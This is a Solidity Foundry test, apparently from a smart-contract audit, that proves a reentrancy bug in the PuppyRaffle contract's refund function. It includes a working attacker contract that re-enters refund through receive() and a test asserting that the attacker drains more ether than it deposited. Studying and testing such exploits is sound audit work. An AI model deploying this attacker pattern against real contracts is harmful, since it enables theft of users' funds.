// SPDX-License-Identifier: MIT
pragma solidity ^0.7.6;
pragma experimental ABIEncoderV2;

// Foundry test — ReentrancyDrain shape, generated by plumbline tlc_to_forge
// and hand-completed for the puppy-raffle 0.7.6 target.
//
// TLC counterexample (docs/tla/ReentrancyDrain.tla):
//   State 0: slot=Live, paid=0
//     Action: PreCheckBuggy(e)
//   State 1: slot=Calling, paid=TicketPrice
//     Action: ReenterBuggy(e)
//   State 2: slot=Calling, paid=2*TicketPrice ← INVARIANT VIOLATED
//
// Asserts that PuppyRaffle::refund (a CEI violation: external call before
// players[i] = address(0)) lets an attacker drain more than their deposit
// via receive() re-entry.

import {Test} from "forge-std/Test.sol";
import {PuppyRaffle} from "../src/PuppyRaffle.sol";

contract ReentrancyAttacker {
    PuppyRaffle public victim;
    uint256 public myIndex;
    uint256 public callsRemaining;
    uint256 public callsExecuted;

    constructor(PuppyRaffle _victim) {
        victim = _victim;
    }

    function attack(uint256 _i, uint256 _callDepth) external payable {
        myIndex = _i;
        callsRemaining = _callDepth;
        callsExecuted = 0;
        victim.refund(myIndex);
    }

    receive() external payable {
        callsExecuted++;
        // Re-enter while slot is still Live (TLC's ReenterBuggy step).
        if (callsRemaining > 1 && address(victim).balance >= 1 ether) {
            callsRemaining--;
            victim.refund(myIndex);
        }
    }
}

contract ReentrancyDrain_PoC is Test {
    PuppyRaffle public victim;
    ReentrancyAttacker public attacker;
    uint256 constant ENTRANCE_FEE = 1 ether;

    function setUp() public {
        // Constructor: (entranceFee, feeAddress, raffleDuration)
        victim = new PuppyRaffle(ENTRANCE_FEE, address(0xBEEF), 1 weeks);
        attacker = new ReentrancyAttacker(victim);

        // PuppyRaffle requires 4 entries minimum to select a winner; the
        // attacker's refund only needs the attacker to be a registered
        // player. We enter 4 players: attacker first (index 0), three
        // honest players after.
        address[] memory players = new address[](1);
        players[0] = address(attacker);
        vm.deal(address(attacker), 100 ether);
        vm.prank(address(attacker));
        victim.enterRaffle{value: ENTRANCE_FEE}(players);

        address[] memory honest = new address[](3);
        honest[0] = address(0x1);
        honest[1] = address(0x2);
        honest[2] = address(0x3);
        vm.deal(address(this), 10 ether);
        victim.enterRaffle{value: ENTRANCE_FEE * 3}(honest);
    }

    /// @notice ClaimedAtMostOnce (docs/tla/ReentrancyDrain.tla) MUST hold:
    ///         each entry pays at most TicketPrice once. TLC's
    ///         counterexample drives paid[e] = k * TicketPrice for k >= 2.
    ///         This test reproduces that on-chain.
    function test_ReentrancyDrain_exploit() public {
        uint256 victimBefore = address(victim).balance;
        uint256 attackerBefore = address(attacker).balance;

        // attacker is playerIndex 0; callDepth 3 = 1 outer + 2 re-entries
        attacker.attack(0, 3);

        uint256 victimAfter = address(victim).balance;
        uint256 attackerAfter = address(attacker).balance;

        // The drain: attacker received more ETH than they put in.
        assertGt(attackerAfter - attackerBefore, ENTRANCE_FEE,
            "attacker should profit from re-entry, received more than their deposit");
        assertGt(attacker.callsExecuted(), 1,
            "expected at least one successful re-entry");
        assertLt(victimAfter, victimBefore,
            "victim balance should decrease by multiple payouts");

        emit log_named_uint("attacker callsExecuted", attacker.callsExecuted());
        emit log_named_uint("attacker net profit (wei)", attackerAfter - attackerBefore);
        emit log_named_uint("victim balance drop (wei)", victimBefore - victimAfter);
    }
}
